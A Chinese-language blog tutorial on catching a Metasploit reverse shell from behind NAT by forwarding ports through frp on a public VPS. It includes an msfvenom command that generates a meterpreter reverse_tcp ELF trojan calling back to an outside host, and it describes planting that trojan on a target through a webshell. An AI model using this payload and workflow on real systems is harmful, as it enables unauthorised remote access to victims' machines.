注:微信公众号,csdn,freebuf原创以及本博客,都为我本人。 转载请邮件告知!

免责声明:由于传播、利用本文所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担

关于处于内网环境的MSF接收反向连接shell

​ 内网渗透两位主流工具无非cs与msf,CobaltStrike与Metasploit不一样,cs架构的它teamserver直接部署在外网ip上,做攻击使用连接方便,而msf没有。

​ 另一方面,对一部分人来说,这种方法的作用某种情况下确确实实是多余的,可能是我的学习方式跟大家不大相同,刹那间的突发奇想,自己也就研究了一下,也是希望能帮助到想到这个问题的小伙伴。

前言

  • 大家的MSF也几乎都是处于虚拟机中的内网环境,攻击的用处也大都是和cobaltstrike传递shell做后渗透。

  • 但是,当我们的主动攻击目标是外网机器,或者说是不同且不通的内网环境,这种情况,我们该如何去接收反向的shell连接呢。

    网上搜索关于msf教程,也通常都是在内网中做的演示,但是在渗透过程中不乏会遇到需要利用msf的exploit进行漏洞利用的过程,本文应运而生,文章创作目的意在帮助需要的小伙伴。

START

核心在于流量转发,使用到的工具

  • frp
  • 独立公网IP的vps
  • xshell
  • 蚁剑
frp配置、

​ frp的配置,使其可以互通

​ 首先在内网kali和自己的vps上下载好frp,没钱买vps就去用提供端口转发的第三方服务,网上太多了。

在这里插入图片描述

​ 简单配置一下

​ vps:frps配置

在这里插入图片描述

​ 内网kali:frpc配置

在这里插入图片描述

​ 连接vps的7000端口通信,并且把本地的2222端口映射到vps的8000端口

​ 接下来测试一下连通性:

在这里插入图片描述

​ 连通是成功的

​ 注意:如果遇到ping通可以,但是nc不能通信,大家可以多换一个端口尝试

木马生成、

​ 生成msf的木马

​ 最简单的命令生成一个

1
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=外网IP LPORT=外网端口 -f elf > /test/shell.elf

​ 留意这个监听payload:linux/x64/meterpreter/reverse_tcp

在这里插入图片描述

​ 之后把shell.elf下载到本地,再通过蚁剑上传到目标机器

在这里插入图片描述

流量转发、

​ 启动frp进行流量转发

在这里插入图片描述

测试上线、

​ 开启msf的监听,等待上线

在这里插入图片描述

​ 这个时候注意默认的payload,是跟我们生成木马时使用的不一样,原则上用什么监听模式生成木马,就用什么监听模式接受反弹shell,所以要改成一样的。

在这里插入图片描述

​ 我们选择监听本地,之所以是2222端口,因为我们前面讲到转发的本地端口是2222

在这里插入图片描述

​ 目标机运行上传的shell.elf

在这里插入图片描述

​ 成功接收到了shell

在这里插入图片描述

OK 结束

这是执行载荷去接收shell的案例,其实用执行命令反弹shell的话(比如ms17010),(不只是MSF)还有一些原理和实现方法是一样的,主要是端口转发。

end